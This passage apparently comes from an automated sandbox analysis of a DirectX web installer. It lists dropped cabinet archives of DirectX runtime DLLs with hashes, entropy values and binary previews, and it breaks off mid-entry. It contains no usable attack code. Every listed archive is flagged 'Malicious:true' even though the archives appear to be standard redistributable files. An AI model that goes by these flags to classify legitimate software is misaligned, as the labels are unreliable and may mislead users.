                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..............=...X!........$;....D3DCompiler_42.dll.....X!....$;...D3DCompiler_42_x86.cat.!....;....$;...D3DCompiler_42_x86.inf.<....>....$;...D3DCompiler_42_x86_xp.inf.....4A....$;...AUG2009_D3DCompiler_42_x86.inf. ..$..CK.Zyx...?..P....%i..@.mh...,e.Y...5...&.!K).Pe.*........;**..zq.j...* ./..s./dR...=.}.....y.o....93I;.+X.c,.....-Ln..o.)z.<.m..F..e...s.|a....!w@...A=..jj(.T}A.j.j@.j..=...c...=...m.....m...m...6.h.o...[....m.h.k+...s<./F.R.'.<..7Vs...f*.......]..M...O6.NVD....o.{v..*.-.ub..........5..q."....V6..m..B._l..w...mI....j.S...mdlG.c..0.*U.p.. ..?.;"ZS..}?b\|...=.<...q...Wb.s..9..:.VG(......ExM.w.Mp.4.N..g...Vjg..7./\nG....Wyn..l.."..;..6...v....S....b1.Y...^..Sk..P....vRl.x..!.u..)Z(B.u.gQL.(...R0..../)>.x...<..d.3(..h.h.XE...."......}T.....(.S<O.(....(n......|......b&.....E.y....),.m{ml7.7..S.G.....[(.S..XE.L..Hc.L...6.w(vR|C...."......y.........M....o..-.....[.h.b....V4.I9...D.As..]h....).]
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Preview:MSCF....t.2.....D...........................t.2..#..................`.S.......$;....d3dcsx_42.dll.....`.S...$;...d3dcsx_42_x86.cat.......T...$;...d3dcsx_42_x86.inf.(.....T...$;...d3dcsx_42_x86_xp.inf.c.....T...$;...AUG2009_d3dcsx_42_x86.inf.?b5B.]..CK.w\T..7.Mnb.QA..E..Q .B...AD..X.q.JS.H..&&.....HS... .a.n.((..J/....!R.a.y..g0......<....9.}.^{.....do3.sb........PL....V......_.|)V..w.a.d.>.#~k.......Z.t.......e.o...#.k.,..x.8.(/\.......5.4....?.Z.B;.9;t/....@..^&..C...m.........f.....#N..._e.c(&f....].-|.....>X..?>..S.#&..!..v.BLl1*b.^.&....},..r|4...}Dy...@....\,.^..R....#v....Gl..j%v..w.k...^.....(...........l..m..,............k..J ..?.o.FL.{e........Cj.{..=.-&.oe_?_'8's....~..k.o.}]<}.a.^jnb.....j...........U..3p.....]pl.C..)8.....#V.G..Yp\.#....0.C..q8...#6.G+..p..:...)....#..G8...H.#..z8..x..8._.;Rp......8.....A8hp..#..Sp\.#..Ox....8..0.c3.RpLk.<.x..-8R.#....q..x..~.?}]Jz.bU8L...........j..z.K...6.{Cl..6.sVsV.Z.....sGUrE;..'..a.#>.._Q.U}....sb.\....}-A.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....P.......D...........................P....#..............w..............3g. .d3dx9_28_x64.cat..6:........35. .d3dx9_28.dll......U:....3. .infinst.exe......\;....39. .d3dx9_28_x64.inf.&...2_;....39. .dec2005_d3dx9_28_x64.inf...;..9..[.... &.m......R.P...?..R...A...8..(...J....H".VB....2.R.H..M.R.)U*.Rm .3.E#.....`.;..>.c..}.H...Nv .%@.mg..c....o:Ll...9...s...H..i\.e.t!..`....R.?.......@......F..o.......H0....vd.I1.x@.b..`.go.\..C...... .E.x l..xY.eHeE.."....o..J.....=...T..`....0o.(..%.Y&v...S...&.....h...HZ.2J.S^f1Xn.+.....WR....$B...H.......G...?y%.$....%?.A.%a...G]..F.sA./.-.R.7.f]@ ....t...D...9.....././....M/..A.yJ..\Io~I...G.......<Gt...7.!.g.".....t.r.w...f....N.6"4.>..A!.M.]u.~.G.^S..\/a../Y.=..u.U....d.i~.K7..<...e.b..G...~].....=isb?.fa6.._..p...X....P6<.k..[...l.`.........~/....D[c...'.]B..zE5...s..N].x..J.....h.&.,. p..an..I..w...y.....z".>.3_0.9. .....Z.U..3.=.......J.yHE.IU./!....._......O..`..%.0.X..5.jd.../bf..=(.**.....n.....Q.*..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1565194 bytes, 5 files, at 0x44 +A "d3dx9_32_x64.cat" +A "d3dx9_32.dll", flags 0x4, ID 6631, number 1, extra bytes 20 in head, 137 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1574362
                                                                                              Entropy (8bit):7.999757508861621
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:AbmMc7lXv7PY1QKs16rjZ1w00Z2xgaJgYRf4MyHGktr3+mlQmxHw8gEeGrs+RDb1:Km7lXk1Zs1Mj0SgyqP3RvxQX7G3H1
                                                                                              MD5:2290064562F2D6D197765F4EDEBC5BF0
                                                                                              SHA1:70C2E3C3EB521BA4C46C428D57166631F86512C8
                                                                                              SHA-256:DA1CE01BE39F41F967282849715E8310DC1887BFEB92C4E0166D2C31F00647F7
                                                                                              SHA-512:B25A517DE79668E3ABD88ACDE835DF4A0D69E70CE0E001DB31D5DEBCD812BCE46F4ADA5E07C036C7BBE88D6DFC9F6531B2198F03FC27FA46070C790B45955DEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#.............................5.a .d3dx9_32_x64.cat...C.......}5.h .d3dx9_32.dll......<C....5T_ .infinst.exe.....'CD....5.` .d3dx9_32_x64.inf.&....ED....5.` .dec2006_d3dx9_32_x64.inf... .....[...J .*.M.P..%A.P...?..O..V..=Z!R._...DQ..E..ha.;.CZ.D.....u8h..A....."3DW4.......o........I...-.[...L..X...ns.xm..M...os.$.cu=.k...Y.=M<.m.'..y.5...k..K.....7.k.B.$.p!E ......bf....n1...4..........T...{.7..........]&.{l7.g..6-.M.k.-3.j]6......m.......<.M..... ...ibM.@..=.....1....@....!4..A..bIxR.3..=.|@i../....f..R NO..7.N..+....SJ..b5)......(.S..5U..6...hG..b..7.....Ye..yu....^`.+.A...x.wn..NI.......>Ld..+|.ij&.4o..2Q.r.$.....}&l...d...|K......_.+.aSP.>...6@A...)\..kL...R.....F.b$~.."...e.):n......^..7..:.3$h~G.EA.A:..8).i......U....L..*PU.....s..$...v.-.:.u..:.DM...Y.......].x...<.z...`y.K...)d.{`......:.c......w.k....?.wU@...r....~.T....j.wg......K./...&,...?......:g....bZ.K#..^<..?...}.q.r....9.;.2..Mh<
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186515 bytes, 6 files, at 0x44 +A "xact2_5_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8443, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):144891
                                                                                              Entropy (8bit):7.997618513042835
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZCISkfUHof5yPnSKfEGMKBQ0sncpIt1EXRN0F+jTx8bh44VhRjR+t2h5fjJfn2EL:ZNdUIRanSK8Gd0nKIAN0F+RWugXRa2bz
                                                                                              MD5:219ABD58672661EA814E3739729DDC04
                                                                                              SHA1:3CFB7D0AE07A9FDA3D77AC761BAC4243ACA961F0
                                                                                              SHA-256:56AEAE85E4E85FCD50D2733371C4977602B720EE72522FE24ED93605BE037C69
                                                                                              SHA-512:8B0EE032677EA0CEC388C017A3AF5FD404F2F26191203D372EF8E95B19F16E669473039C70287B58759422D6DCACD3A1D45A6F13D85952CF5DFD56EC63EADF02
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................ ...............#..................! .........5.a .xact2_5_x64.cat..E..! ....o5.\ .x3daudio1_1.dll.....9e.....5.` .xactengine2_5.dll.....QZ.....5T_ .infinst.exe.....ia.....5.` .dec2006_xact_x64.inf......d.....5.` .xact2_5_x64.inf....V.:..[.........A.P$..O.v..lM.!I.S.T..FJ%;..R.U..pj&...L..:.B. .W.I.... .3.43.`...W...kK..p......-].5....)R...V..vW...mu...]].M...al..5%:..vi,C .JH..81&..$..O!(..........D#`F.5......$.!..# F...4F.....4..E......Yx...>...6.b8..a..Bh.......`..`G2.9..0%.0y!..P8.M..L...j.-?d+...2.m..S..P2,`.cg...M.....M..^.....!.U..I.(..P.....<..p..@.......]..G..A&B.HD..(\.GM.......A..^!.B.W.U.L..r....A.".....t.0`@Zw.Fa...s....C.......Q...,.N...W.C.P........|...R.^@.....2..(..3.....N....z...wd\..O,...........~...J"GQO|...4... %.I.BU..>E+Y&r.HdA[.c..,.h.../F..k...>...$d....ko."T@os...N&..'.z...FJ.y..;. ......y...]..i`.@..O.........gk...NW.B...5-.....C........']~|..HR]....'.....|.n..).2..'.dT.G.....p......k.8!^...;.e
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
